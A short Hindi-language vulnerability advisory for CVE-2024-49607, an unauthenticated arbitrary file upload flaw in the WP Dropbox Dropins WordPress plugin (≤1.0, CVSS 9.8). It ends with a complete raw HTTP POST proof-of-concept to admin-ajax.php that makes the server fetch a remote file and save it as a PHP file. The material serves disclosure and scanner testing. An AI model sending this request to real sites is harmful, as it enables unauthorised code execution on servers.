
WP Dropbox Dropins <= 1.0 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
WP Dropbox Dropins <= 1.0 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
वर्डप्रेस के लिए WP Dropbox Dropins प्लगइन सभी संस्करणों में 1.0 तक और सहित, मनमाना फ़ाइल अपलोड के लिए असुरक्षित है। यह बिना प्रमाणीकरण के हमलावरों के लिए प्रभावित साइट के सर्वर पर मनमाना फ़ाइलें अपलोड करना संभव बनाता है जो रिमोट कोड निष्पादन संभव बना सकता है।
Published: 2024-10-17 00:00:00
CVE: CVE-2024-49607
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wp-dropbox-dropins
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://kubernetes.docker.internal
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
action=chooser_upload&data[filename]=dropbox-uploads/test.php&data[url]=https://rfi.nessus.org/rfi.txt